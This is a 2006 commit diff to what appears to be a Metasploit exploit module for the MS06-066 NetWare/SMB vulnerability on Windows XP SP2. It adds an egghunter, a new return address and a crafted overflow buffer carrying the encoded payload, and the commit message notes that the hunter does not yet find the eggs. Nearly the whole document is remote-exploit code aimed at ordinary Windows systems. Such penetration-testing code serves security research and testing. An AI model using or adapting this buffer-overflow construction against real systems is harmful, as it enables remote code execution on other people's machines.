Much closer, but the egg hunter never seems to find the eggs :(

git-svn-id: file:///home/svn/framework3/trunk@4158 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-01 16:39:25 +00:00 · 2006-12-01 16:39:25 +00:00 · c619cc6a12
parent dc0ad61c85
commit c619cc6a12
1 changed files with 26 additions and 6 deletions
--- a/modules/exploits/windows/smb/ms06_066_nwapi.rb
+++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb
@ -3,7 +3,8 @@ require 'msf/core'
 module Msf

 class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
-
+    
+	include Exploit::Remote::Egghunter
 	include Exploit::Remote::DCERPC
 	include Exploit::Remote::SMB
 	
@ -30,7 +31,7 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
 			'Privileged'     => true,
 			'Payload'        =>
 				{
-					'Space'    => 1000,
+					'Space'    => 296,
 					'BadChars' => "",
 					'Compat'   => 
 					{
@ -44,7 +45,8 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
 					[ 
 						'Windows XP SP2',
 						{
-							'Ret'      => 0x0BADB0D0 ,
+							#'Ret'      => 0x0BADB0D0 ,
+							'Ret'      => 0x00EBEEEC ,
 						},
 					]
 				],
@ -64,15 +66,33 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
 		# [in] wchar *
 		# [in, out] long
 		# [out] handle
-	
-		ofstring	= Rex::Text.to_unicode('\\\\') + "A"*296 + [ target.ret ].pack('V') + "\x00\x00"	# greater than 512 bytes
+
+		# Generate the egghunter payload
+		hunter = generate_egghunter()
+		egg    = hunter[1]
+		#print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")						
+
+        # Add giant blocks of guard data before and after the egg 
+        eggdata  = 
+			Rex::Text.rand_text(1024) +
+            egg +
+            egg + 
+            payload.encoded +
+			Rex::Text.rand_text(1024)
+
+		buflen = 295
+		ofstring	= Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
+					[ target.ret ].pack('V') + "\x00"	
+		#ofstring	= Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
 	    stubdata = 
 						NDR.long(rand(0xffffffff)) +
                        NDR.UnicodeConformantVaryingString("\\\\BBBB") +
 						NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) +  # HERE!
 						#NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + 
 						NDR.long(rand(0xffffffff)) +
-						NDR.long((ofstring.length * 2) + 0xC) + 
+						NDR.long(rand(0xffffffff)) +
+						#NDR.long((ofstring.length * 2) + 0xC) + 
+						eggdata